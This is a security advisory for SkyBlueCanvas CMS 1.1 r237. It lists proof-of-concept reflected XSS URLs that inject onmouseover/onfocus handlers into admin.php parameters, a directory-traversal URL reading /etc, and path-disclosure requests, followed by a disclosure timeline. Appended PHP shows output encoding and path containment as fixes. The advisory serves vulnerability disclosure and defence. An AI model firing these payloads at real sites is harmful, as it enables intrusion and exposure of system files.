SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

Credit: InterNOT
Risk: Medium
Local: No
Remote: Yes

Version Affected: 1.1 r237 (newest version: 1.1 r246)

Info:
SkyBlueCanvas Lightweight CMS is an open source, free content management system written in PHP and built specifically for small web sites. The entire site you are viewing is a demonstration of the SkyBlueCanvas lightweight CMS. SkyBlueCanvas is custom-built for those instances when more robust systems like Joomla, WordPress and Drupal are too much horsepower.

Credits: InterN0T

-:: The Advisory ::-

Vulnerable Function / ID Calls: mgroup, mgr, objtype, id & dir.

Cross Site Scripting: (requires administrator access - will not survive a login screen)
http://[HOST]/skybluecanvas/admin.php?mgroup=" onmouseover=alert(0) > &mgr=email&objtype=email&sub=viewemail&id=2
http://[HOST]/skybluecanvas/admin.php?mgroup=collections&mgr=" onmouseover=alert(0) > &com=manager

Impossible XSS: (XML errors or hidden tags preventing use of event handlers.)
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS
http://[HOST]/skybluecanvas/admin.php?mgroup=settings&mgr=configuration&objtype=">XSS
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page&sub=editpage&id=" onfocus=alert(0) >
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir='XSS

Path Content Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../../../../../../../etc/
-- This was done in a folder where /skybluecanvas was located in: /var/www/somesite.tld/awebdir/skybluecanvas/
--=-- In the above, if one goes to a folder with many subdirectories, the above will fail due to a memory allocation flaw.

Path Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media&dir=all&sub=move&id='
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media&dir=all&sub=rename&id='

-:: Solution ::-
Filter event handlers out from function calls.

Conclusion:
Pretty secure system overall, but if one is a little inventive, then the above issues might be exploitable.

Reference: s-1-1-r237-multiple-vulnerabilities.html

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Bugtraq (SecurityFocus) contacted the 12th June.

All of the best,
MaXe
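
Filtering event handlers, as the Solution suggests, leaves the attribute breakout itself in place; encoding the listed parameters on output and confining dir to the media root addresses both issue classes. The PHP below is an added example, not SkyBlueCanvas code and not part of the original advisory; attr(), resolve_media_dir() and the demo directory are hypothetical names.

```php
<?php
// Added example; not SkyBlueCanvas code. attr(), resolve_media_dir() and the
// demo directory are hypothetical names chosen for illustration.

// Encode a request value for output inside a quoted HTML attribute.
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute
// and introduce an event handler such as onmouseover.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Resolve a user-supplied "dir" value beneath $root. Returns the canonical
// path, or null when it does not exist or resolves outside $root.
function resolve_media_dir(string $root, string $dir): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . $dir);
    if ($candidate === false || !is_dir($candidate)) {
        return null;
    }
    // Compare against root plus separator so "/media-old" cannot pass as "/media".
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if ($candidate !== $rootReal && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo input: a temporary media root with one subdirectory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'sbc_media_demo';
@mkdir($root . DIRECTORY_SEPARATOR . 'gallery', 0700, true);

// The mgroup value from the advisory, rendered into an attribute.
$mgroup = '" onmouseover=alert(0) >';
echo '<input type="hidden" name="mgroup" value="' . attr($mgroup) . '">', PHP_EOL;

// A directory inside the root resolves; the advisory's traversal value does not.
var_dump(resolve_media_dir($root, 'gallery') !== null);
var_dump(resolve_media_dir($root, '../../../../../../../etc/'));
```

The containment check runs on the canonical path returned by realpath(), so encoded or nested ../ sequences are judged by where they actually resolve rather than by string matching on the input.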
